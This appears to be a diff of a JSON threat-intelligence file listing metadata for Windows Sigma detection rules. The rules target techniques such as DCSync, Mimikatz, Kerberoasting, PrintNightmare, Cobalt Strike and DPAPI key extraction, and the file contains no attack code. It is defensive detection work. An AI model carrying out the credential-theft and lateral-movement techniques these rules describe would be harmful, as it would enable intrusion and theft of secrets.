"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/ntlm/win_susp_ntlm_rdp.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1219" - ], - 
"creation_date": "2020/05/22", - "filename": "win_susp_ntlm_rdp.yml", - "author": "James Pemberton", - "level": "medium", - "falsepositive": [ - "Host connections to valid domains, exclude these.", - "Host connections not using host FQDN.", - "Host connections to external legitimate domains." - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects scenarios where an attacker enables the OpenSSH server and server starts to listening on SSH socket.", - "uuid": "3ce8e9a4-bc61-4c9b-8e69-d7e2492a8781", - "value": "OpenSSH Server Listening On Socket", - "meta": { - "refs": [ - "https://github.com/mdecrevoisier/EVTX-to-MITRE-Attack/tree/master/TA0008-Lateral%20Movement/T1021.004-Remote%20Service%20SSH", - "https://winaero.com/enable-openssh-server-windows-10/", - "https://docs.microsoft.com/en-us/windows-server/administration/openssh/openssh_install_firstuse", - "https://virtualizationreview.com/articles/2020/05/21/ssh-server-on-windows-10.aspx", - "https://medium.com/threatpunter/detecting-adversary-tradecraft-with-image-load-event-logging-and-eql-8de93338c16", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/openssh/win_sshd_openssh_server_listening_on_socket.yml" - ], - "tags": [ - "attack.lateral_movement", - "attack.t1021.004" - ], - "creation_date": "2022/10/25", - "filename": "win_sshd_openssh_server_listening_on_socket.yml", - "author": "mdecrevoisier", - "level": "medium", - "falsepositive": [ - "Legitimate administrator activity" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects events of driver load errors in print service logs that could be a sign of successful exploitation attempts of print spooler vulnerability CVE-2021-1675", - "uuid": "4e64668a-4da1-49f5-a8df-9e2d5b866718", - "value": "Possible CVE-2021-1675 Print Spooler Exploitation", - "meta": { - "refs": [ - 
"https://github.com/hhlxf/PrintNightmare", - "https://github.com/afwu/PrintNightmare", - "https://twitter.com/fuzzyf10w/status/1410202370835898371", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/printservice/win_exploit_cve_2021_1675_printspooler.yml" - ], - "tags": [ - "attack.execution", - "attack.t1569", - "cve.2021.1675" - ], - "creation_date": "2021/06/30", - "filename": "win_exploit_cve_2021_1675_printspooler.yml", - "author": "Florian Roth, KevTheHermit, fuzzyf10w, Tim Shelton", - "level": "high", - "falsepositive": [ - "Problems with printer drivers" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects driver load events print service operational log that are a sign of successful exploitation attempts against print spooler vulnerability CVE-2021-1675", - "uuid": "f34d942d-c8c4-4f1f-b196-22471aecf10a", - "value": "CVE-2021-1675 Print Spooler Exploitation", - "meta": { - "refs": [ - "https://twitter.com/MalwareJake/status/1410421967463731200", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/printservice/win_exploit_cve_2021_1675_printspooler_operational.yml" - ], - "tags": [ - "attack.execution", - "attack.t1569", - "cve.2021.1675" - ], - "creation_date": "2021/07/01", - "filename": "win_exploit_cve_2021_1675_printspooler_operational.yml", - "author": "Florian Roth", - "level": "critical", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "This detection uses Windows security events to detect suspicious access attempts to the registry key of Azure AD Health monitoring agent.\nThis detection requires an access control entry (ACE) on the system access control list (SACL) of the following securable object HKLM\\SOFTWARE\\Microsoft\\Microsoft Online\\Reporting\\MonitoringAgent.\n", - "uuid": "ff151c33-45fa-475d-af4f-c2f93571f4fe", - "value": 
"Azure AD Health Monitoring Agent Registry Keys Access", - "meta": { - "refs": [ - "https://o365blog.com/post/hybridhealthagent/", - "https://github.com/OTRF/Set-AuditRule/blob/c3dec5443414231714d850565d364ca73475ade5/rules/registry/aad_connect_health_monitoring_agent.yml", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_aadhealth_mon_agent_regkey_access.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1012" - ], - "creation_date": "2021/08/26", - "filename": "win_security_aadhealth_mon_agent_regkey_access.yml", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "This detection uses Windows security events to detect suspicious access attempts to the registry key values and sub-keys of Azure AD Health service agents (e.g AD FS).\nInformation from AD Health service agents can be used to potentially abuse some of the features provided by those services in the cloud (e.g. 
Federation).\nThis detection requires an access control entry (ACE) on the system access control list (SACL) of the following securable object: HKLM:\\SOFTWARE\\Microsoft\\ADHealthAgent.\nMake sure you set the SACL to propagate to its sub-keys.\n", - "uuid": "1d2ab8ac-1a01-423b-9c39-001510eae8e8", - "value": "Azure AD Health Service Agents Registry Keys Access", - "meta": { - "refs": [ - "https://o365blog.com/post/hybridhealthagent/", - "https://github.com/OTRF/Set-AuditRule/blob/c3dec5443414231714d850565d364ca73475ade5/rules/registry/aad_connect_health_service_agent.yml", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_aadhealth_svc_agent_regkey_access.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1012" - ], - "creation_date": "2021/08/26", - "filename": "win_security_aadhealth_svc_agent_regkey_access.yml", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "This rule tries to detect token impersonation and theft. 
(Example: DuplicateToken(Ex) and ImpersonateLoggedOnUser with the LOGON32_LOGON_NEW_CREDENTIALS flag.)", - "uuid": "02f7c9c1-1ae8-4c6a-8add-04693807f92f", - "value": "Access Token Abuse", - "meta": { - "refs": [ - "https://attack.mitre.org/techniques/T1134/001/", - "https://www.elastic.co/fr/blog/how-attackers-abuse-access-token-manipulation", - "https://www.manageengine.com/log-management/cyber-security/access-token-manipulation.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_access_token_abuse.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1134.001" - ], - "creation_date": "2022/11/06", - "filename": "win_security_access_token_abuse.yml", - "author": "Michaela Adams, Zach Mathis", - "level": "medium", - "falsepositive": [ - "Anti-Virus" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Backdooring domain object to grant the rights associated with DCSync to a regular user or machine account using Powerview\\Add-DomainObjectAcl DCSync Extended Right cmdlet, will allow to re-obtain the pwd hashes of any user/computer", - "uuid": "2c99737c-585d-4431-b61a-c911d86ff32f", - "value": "Powerview Add-DomainObjectAcl DCSync AD Extend Right", - "meta": { - "refs": [ - "https://twitter.com/menasec1/status/1111556090137903104", - "https://www.specterops.io/assets/resources/an_ace_up_the_sleeve.pdf", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_account_backdoor_dcsync_rights.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1098" - ], - "creation_date": "2019/04/03", - "filename": "win_security_account_backdoor_dcsync_rights.yml", - "author": "Samir Bousseaden; Roberto Rodriguez @Cyb3rWard0g; oscd.community; Tim Shelton; Maxence Fossat", - "level": "high", - "falsepositive": [ - "New Domain Controller computer account, check user SIDs within the value 
attribute of event 5136 and verify if it's a regular user or DC computer account." - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detect priv users or groups recon based on 4661 eventid and known privileged users or groups SIDs", - "uuid": "35ba1d85-724d-42a3-889f-2e2362bcaf23", - "value": "AD Privileged Users or Groups Reconnaissance", - "meta": { - "refs": [ - "https://blog.menasec.net/2019/02/threat-hunting-5-detecting-enumeration.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_account_discovery.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1087.002" - ], - "creation_date": "2019/04/03", - "filename": "win_security_account_discovery.yml", - "author": "Samir Bousseaden", - "level": "high", - "falsepositive": [ - "If source account name is not an admin then its super suspicious" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects certificate creation with template allowing risk permission subject", - "uuid": "5ee3a654-372f-11ec-8d3d-0242ac130003", - "value": "ADCS Certificate Template Configuration Vulnerability", - "meta": { - "refs": [ - "https://www.specterops.io/assets/resources/Certified_Pre-Owned.pdf", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_adcs_certificate_template_configuration_vulnerability.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.credential_access" - ], - "creation_date": "2021/11/17", - "filename": "win_security_adcs_certificate_template_configuration_vulnerability.yml", - "author": "Orlinum , BlueDefenZer", - "level": "low", - "falsepositive": [ - "Administrator activity", - "Proxy SSL certificate with subject modification", - "Smart card enrollement" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": 
"Detects certificate creation with template allowing risk permission subject and risky EKU", - "uuid": "bfbd3291-de87-4b7c-88a2-d6a5deb28668", - "value": "ADCS Certificate Template Configuration Vulnerability with Risky EKU", - "meta": { - "refs": [ - "https://www.specterops.io/assets/resources/Certified_Pre-Owned.pdf", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_adcs_certificate_template_configuration_vulnerability_eku.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.credential_access" - ], - "creation_date": "2021/11/17", - "filename": "win_security_adcs_certificate_template_configuration_vulnerability_eku.yml", - "author": "Orlinum , BlueDefenZer", - "level": "high", - "falsepositive": [ - "Administrator activity", - "Proxy SSL certificate with subject modification", - "Smart card enrollement" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects the creation or removal of a computer. 
Can be used to detect attacks such as DCShadow via the creation of a new SPN.", - "uuid": "20d96d95-5a20-4cf1-a483-f3bda8a7c037", - "value": "Add or Remove Computer from DC", - "meta": { - "refs": [ - "https://github.com/Yamato-Security/EnableWindowsLogSettings/blob/7f6d755d45ac7cc9fc35b0cbf498e6aa4ef19def/ConfiguringSecurityLogAuditPolicies.md", - "https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4741", - "https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4743", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_add_remove_computer.yml" - ], - "tags": "No established tags", - "creation_date": "2022/10/14", - "filename": "win_security_add_remove_computer.yml", - "author": "frack113", - "level": "low", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects logon with \"Special groups\" and \"Special Privileges\" can be thought of as Administrator groups or privileges.", - "uuid": "94309181-d345-4cbf-b5fe-061769bdf9cb", - "value": "User with Privileges Logon", - "meta": { - "refs": [ - "https://github.com/Yamato-Security/EnableWindowsLogSettings/blob/7f6d755d45ac7cc9fc35b0cbf498e6aa4ef19def/ConfiguringSecurityLogAuditPolicies.md", - "https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4672", - "https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4964", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_admin_logon.yml" - ], - "tags": "No established tags", - "creation_date": "2022/10/14", - "filename": "win_security_admin_logon.yml", - "author": "frack113", - "level": "low", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detect remote login by 
Administrator user (depending on internal pattern).", - "uuid": "0f63e1ef-1eb9-4226-9d54-8927ca08520a", - "value": "Admin User Remote Logon", - "meta": { - "refs": [ - "https://car.mitre.org/wiki/CAR-2016-04-005", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_admin_rdp_login.yml" - ], - "tags": [ - "attack.lateral_movement", - "attack.t1078.001", - "attack.t1078.002", - "attack.t1078.003", - "car.2016-04-005" - ], - "creation_date": "2017/10/29", - "filename": "win_security_admin_rdp_login.yml", - "author": "juju4", - "level": "low", - "falsepositive": [ - "Legitimate administrative activity." - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects access to $ADMIN share", - "uuid": "098d7118-55bc-4912-a836-dc6483a8d150", - "value": "Access to ADMIN$ Share", - "meta": { - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_admin_share_access.yml" - ], - "tags": [ - "attack.lateral_movement", - "attack.t1021.002" - ], - "creation_date": "2017/03/04", - "filename": "win_security_admin_share_access.yml", - "author": "Florian Roth", - "level": "low", - "falsepositive": [ - "Legitimate administrative activity" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects WRITE_DAC access to a domain object", - "uuid": "028c7842-4243-41cd-be6f-12f3cf1a26c7", - "value": "AD Object WriteDAC Access", - "meta": { - "refs": [ - "https://threathunterplaybook.com/notebooks/windows/05_defense_evasion/WIN-190101151110.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_ad_object_writedac_access.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1222.001" - ], - "creation_date": "2019/09/12", - "filename": "win_security_ad_object_writedac_access.yml", - "author": "Roberto Rodriguez 
@Cyb3rWard0g", - "level": "critical", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects potential abuse of Active Directory Replication Service (ADRS) from a non machine account to request credentials.", - "uuid": "17d619c1-e020-4347-957e-1d1207455c93", - "value": "Active Directory Replication from Non Machine Account", - "meta": { - "refs": [ - "https://threathunterplaybook.com/notebooks/windows/06_credential_access/WIN-180815210510.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_ad_replication_non_machine_account.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003.006" - ], - "creation_date": "2019/07/26", - "filename": "win_security_ad_replication_non_machine_account.yml", - "author": "Roberto Rodriguez @Cyb3rWard0g", - "level": "critical", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects access to a domain user from a non-machine account", - "uuid": "ab6bffca-beff-4baa-af11-6733f296d57a", - "value": "AD User Enumeration", - "meta": { - "refs": [ - "https://www.specterops.io/assets/resources/an_ace_up_the_sleeve.pdf", - "http://www.stuffithoughtiknew.com/2019/02/detecting-bloodhound.html", - "https://docs.microsoft.com/en-us/windows/win32/adschema/attributes-all", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_ad_user_enumeration.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1087.002" - ], - "creation_date": "2020/03/30", - "filename": "win_security_ad_user_enumeration.yml", - "author": "Maxime Thiebaut (@0xThiebaut)", - "level": "medium", - "falsepositive": [ - "Administrators configuring new users." 
- ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects scenario where if a user is assigned the SeEnableDelegationPrivilege right in Active Directory it would allow control of other AD user objects.", - "uuid": "311b6ce2-7890-4383-a8c2-663a9f6b43cd", - "value": "Enabled User Right in AD to Control User Objects", - "meta": { - "refs": [ - "https://www.harmj0y.net/blog/activedirectory/the-most-dangerous-user-right-you-probably-have-never-heard-of/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_alert_active_directory_user_control.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1098" - ], - "creation_date": "2017/07/30", - "filename": "win_security_alert_active_directory_user_control.yml", - "author": "@neu5ron", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects scenarios where one can control another users or computers account without having to use their credentials.", - "uuid": "300bac00-e041-4ee2-9c36-e262656a6ecc", - "value": "Active Directory User Backdoors", - "meta": { - "refs": [ - "https://msdn.microsoft.com/en-us/library/cc220234.aspx", - "https://adsecurity.org/?p=3466", - "https://www.harmj0y.net/blog/redteaming/another-word-on-delegation/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_alert_ad_user_backdoors.yml" - ], - "tags": [ - "attack.t1098", - "attack.persistence" - ], - "creation_date": "2017/04/13", - "filename": "win_security_alert_ad_user_backdoors.yml", - "author": "@neu5ron", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects scenario where weak encryption is enabled for a user profile which could be used for 
hash/password cracking.", - "uuid": "f6de9536-0441-4b3f-a646-f4e00f300ffd", - "value": "Weak Encryption Enabled and Kerberoast", - "meta": { - "refs": [ - "https://adsecurity.org/?p=2053", - "https://www.harmj0y.net/blog/activedirectory/roasting-as-reps/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_alert_enable_weak_encryption.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.001" - ], - "creation_date": "2017/07/30", - "filename": "win_security_alert_enable_weak_encryption.yml", - "author": "@neu5ron", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "This events that are generated when using the hacktool Ruler by Sensepost", - "uuid": "24549159-ac1b-479c-8175-d42aea947cae", - "value": "Hacktool Ruler", - "meta": { - "refs": [ - "https://github.com/sensepost/ruler", - "https://github.com/sensepost/ruler/issues/47", - "https://github.com/staaldraad/go-ntlm/blob/cd032d41aa8ce5751c07cb7945400c0f5c81e2eb/ntlm/ntlmv1.go#L427", - "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4776", - "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4624", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_alert_ruler.yml" - ], - "tags": [ - "attack.discovery", - "attack.execution", - "attack.t1087", - "attack.t1114", - "attack.t1059", - "attack.t1550.002" - ], - "creation_date": "2017/05/31", - "filename": "win_security_alert_ruler.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Go utilities that use staaldraad awesome NTLM library" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects Chafer activity attributed to OilRig as reported in Nyotron report in March 2018", - "uuid": 
"c0580559-a6bd-4ef6-b9b7-83703d98b561", - "value": "Chafer Activity - Security", - "meta": { - "refs": [ - "https://nyotron.com/nyotron-discovers-next-generation-oilrig-attacks/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_apt_chafer_mar18_security.yml" - ], - "tags": [ - "attack.persistence", - "attack.g0049", - "attack.t1053.005", - "attack.s0111", - "attack.t1543.003", - "attack.defense_evasion", - "attack.t1112", - "attack.command_and_control", - "attack.t1071.004" - ], - "creation_date": "2018/03/23", - "filename": "win_security_apt_chafer_mar18_security.yml", - "author": "Florian Roth, Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community", - "level": "critical", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects the deactivation and disabling of the Scheduled defragmentation task as seen by Slingshot APT group", - "uuid": "c5a178bf-9cfb-4340-b584-e4df39b6a3e7", - "value": "Defrag Deactivation - Security", - "meta": { - "refs": [ - "https://securelist.com/apt-slingshot/84312/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_apt_slingshot.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1053", - "attack.s0111" - ], - "creation_date": "2019/03/04", - "filename": "win_security_apt_slingshot.yml", - "author": "Florian Roth, Bartlomiej Czyz (@bczyz1)", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects activity mentioned in Operation Wocao report", - "uuid": "74ad4314-482e-4c3e-b237-3f7ed3b9ca8d", - "value": "Operation Wocao Activity - Security", - "meta": { - "refs": [ - "https://www.fox-it.com/en/news/whitepapers/operation-wocao-shining-a-light-on-one-of-chinas-hidden-hacking-groups/", - 
"https://twitter.com/SBousseaden/status/1207671369963646976", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_apt_wocao.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1012", - "attack.defense_evasion", - "attack.t1036.004", - "attack.t1027", - "attack.execution", - "attack.t1053.005", - "attack.t1059.001" - ], - "creation_date": "2019/12/20", - "filename": "win_security_apt_wocao.yml", - "author": "Florian Roth, frack113", - "level": "high", - "falsepositive": [ - "Administrators that use checkadmin.exe tool to enumerate local administrators" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects remote task creation via at.exe or API interacting with ATSVC namedpipe", - "uuid": "f6de6525-4509-495a-8a82-1f8b0ed73a00", - "value": "Remote Task Creation via ATSVC Named Pipe", - "meta": { - "refs": [ - "https://blog.menasec.net/2019/03/threat-hunting-25-scheduled-tasks-for.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_atsvc_task.yml" - ], - "tags": [ - "attack.lateral_movement", - "attack.persistence", - "car.2013-05-004", - "car.2015-04-001", - "attack.t1053.002" - ], - "creation_date": "2019/04/03", - "filename": "win_security_atsvc_task.yml", - "author": "Samir Bousseaden", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Potential adversaries accessing the microphone and webcam in an endpoint.", - "uuid": "8cd538a4-62d5-4e83-810b-12d41e428d6e", - "value": "Processes Accessing the Microphone and Webcam", - "meta": { - "refs": [ - "https://twitter.com/duzvik/status/1269671601852813320", - "https://medium.com/@7a616368/can-you-track-processes-accessing-the-camera-and-microphone-7e6885b37072", - 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_camera_microphone_access.yml" - ], - "tags": [ - "attack.collection", - "attack.t1123" - ], - "creation_date": "2020/06/07", - "filename": "win_security_camera_microphone_access.yml", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects known malicious service installs that appear in cases in which a Cobalt Strike beacon elevates privileges or lateral movement", - "uuid": "d7a95147-145f-4678-b85d-d1ff4a3bb3f6", - "value": "CobaltStrike Service Installations - Security", - "meta": { - "refs": [ - "https://www.sans.org/webcasts/119395", - "https://www.crowdstrike.com/blog/getting-the-bacon-from-cobalt-strike-beacon/", - "https://thedfirreport.com/2021/08/29/cobalt-strike-a-defenders-guide/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_cobaltstrike_service_installs.yml" - ], - "tags": [ - "attack.execution", - "attack.privilege_escalation", - "attack.lateral_movement", - "attack.t1021.002", - "attack.t1543.003", - "attack.t1569.002" - ], - "creation_date": "2021/05/26", - "filename": "win_security_cobaltstrike_service_installs.yml", - "author": "Florian Roth, Wojciech Lesicki", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects the use of the spoolss named pipe over SMB. 
This can be used to trigger the authentication via NTLM of any machine that has the spoolservice enabled.", - "uuid": "214e8f95-100a-4e04-bb31-ef6cba8ce07e", - "value": "DCERPC SMB Spoolss Named Pipe", - "meta": { - "refs": [ - "https://posts.specterops.io/hunting-in-active-directory-unconstrained-delegation-forests-trusts-71f2b33688e1", - "https://dirkjanm.io/a-different-way-of-abusing-zerologon/", - "https://twitter.com/_dirkjan/status/1309214379003588608", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_dce_rpc_smb_spoolss_named_pipe.yml" - ], - "tags": [ - "attack.lateral_movement", - "attack.t1021.002" - ], - "creation_date": "2018/11/28", - "filename": "win_security_dce_rpc_smb_spoolss_named_pipe.yml", - "author": "OTR (Open Threat Research)", - "level": "medium", - "falsepositive": [ - "Domain Controllers acting as printer servers too? :)" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects a threat actor creating a file named `iertutil.dll` in the `C:\\Program Files\\Internet Explorer\\` directory over the network for a DCOM InternetExplorer DLL Hijack scenario.", - "uuid": "c39f0c81-7348-4965-ab27-2fde35a1b641", - "value": "DCOM InternetExplorer.Application Iertutil DLL Hijack - Security", - "meta": { - "refs": [ - "https://threathunterplaybook.com/notebooks/windows/08_lateral_movement/WIN-201009183000.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_dcom_iertutil_dll_hijack.yml" - ], - "tags": [ - "attack.lateral_movement", - "attack.t1021.002", - "attack.t1021.003" - ], - "creation_date": "2020/10/12", - "filename": "win_security_dcom_iertutil_dll_hijack.yml", - "author": "Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR)", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - 
"description": "Detects Mimikatz DC sync security events", - "uuid": "611eab06-a145-4dfa-a295-3ccc5c20f59a", - "value": "Mimikatz DC Sync", - "meta": { - "refs": [ - "https://twitter.com/gentilkiwi/status/1003236624925413376", - "https://gist.github.com/gentilkiwi/dcc132457408cf11ad2061340dcb53c2", - "https://blog.blacklanternsecurity.com/p/detecting-dcsync?s=r", - "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4662", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_dcsync.yml" - ], - "tags": [ - "attack.credential_access", - "attack.s0002", - "attack.t1003.006" - ], - "creation_date": "2018/06/03", - "filename": "win_security_dcsync.yml", - "author": "Benjamin Delpy, Florian Roth, Scott Dermott, Sorina Ionescu", - "level": "high", - "falsepositive": [ - "Valid DC Sync that is not covered by the filters; please report", - "Local Domain Admin account used for Azure AD Connect" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects scenarios where an windows defender exclusion was added in registry where an entity would want to bypass antivirus scanning from windows defender", - "uuid": "e9c8808f-4cfb-4ba9-97d4-e5f3beaa244d", - "value": "Windows Defender Exclusion Set", - "meta": { - "refs": [ - "https://www.bleepingcomputer.com/news/security/gootkit-malware-bypasses-windows-defender-by-setting-path-exclusions/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_defender_bypass.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.001" - ], - "creation_date": "2019/10/26", - "filename": "win_security_defender_bypass.yml", - "author": "@BarryShooshooga", - "level": "high", - "falsepositive": [ - "Intended inclusions by administrator" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects an 
installation of a device that is forbidden by the system policy", - "uuid": "c9eb55c3-b468-40ab-9089-db2862e42137", - "value": "Device Installation Blocked", - "meta": { - "refs": [ - "https://github.com/Yamato-Security/EnableWindowsLogSettings/blob/7f6d755d45ac7cc9fc35b0cbf498e6aa4ef19def/ConfiguringSecurityLogAuditPolicies.md", - "https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-6423", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_device_installation_blocked.yml" - ], - "tags": "No established tags", - "creation_date": "2022/10/14", - "filename": "win_security_device_installation_blocked.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects the default \"UserName\" used by the DiagTrackEoP POC", - "uuid": "2111118f-7e46-4fc8-974a-59fd8ec95196", - "value": "DiagTrackEoP Default Login Username", - "meta": { - "refs": [ - "https://github.com/Wh04m1001/DiagTrackEoP/blob/3a2fc99c9700623eb7dc7d4b5f314fd9ce5ef51f/main.cpp#L46", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_diagtrack_eop_default_login_username.yml" - ], - "tags": [ - "attack.privilege_escalation" - ], - "creation_date": "2022/08/03", - "filename": "win_security_diagtrack_eop_default_login_username.yml", - "author": "Nasreddine Bencherchali", - "level": "critical", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects scenarios where system auditing (ie: windows event log auditing) is disabled.\nThis may be used in a scenario where an entity would want to bypass local logging to evade detection when windows event logging is enabled and reviewed.\nAlso, it is recommended to turn off \"Local Group Policy Object 
Processing\" via GPO, which will make sure that Active Directory GPOs take precedence over local/edited computer policies via something such as \"gpedit.msc\".\nPlease note, that disabling \"Local Group Policy Object Processing\" may cause an issue in scenarios of one off specific GPO modifications -- however it is recommended to perform these modifications in Active Directory anyways.\n", - "uuid": "69aeb277-f15f-4d2d-b32a-55e883609563", - "value": "Disabling Windows Event Auditing", - "meta": { - "refs": [ - "https://docs.google.com/presentation/d/1dkrldTTlN3La-OjWtkWJBb4hVk6vfsSMBFBERs6R8zA/edit", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_disable_event_logging.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.002" - ], - "creation_date": "2017/11/19", - "filename": "win_security_disable_event_logging.yml", - "author": "@neu5ron", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects tools extracting LSA secret DPAPI domain backup key from Domain Controllers", - "uuid": "4ac1f50b-3bd0-4968-902d-868b4647937e", - "value": "DPAPI Domain Backup Key Extraction", - "meta": { - "refs": [ - "https://threathunterplaybook.com/notebooks/windows/06_credential_access/WIN-190620024610.html", - 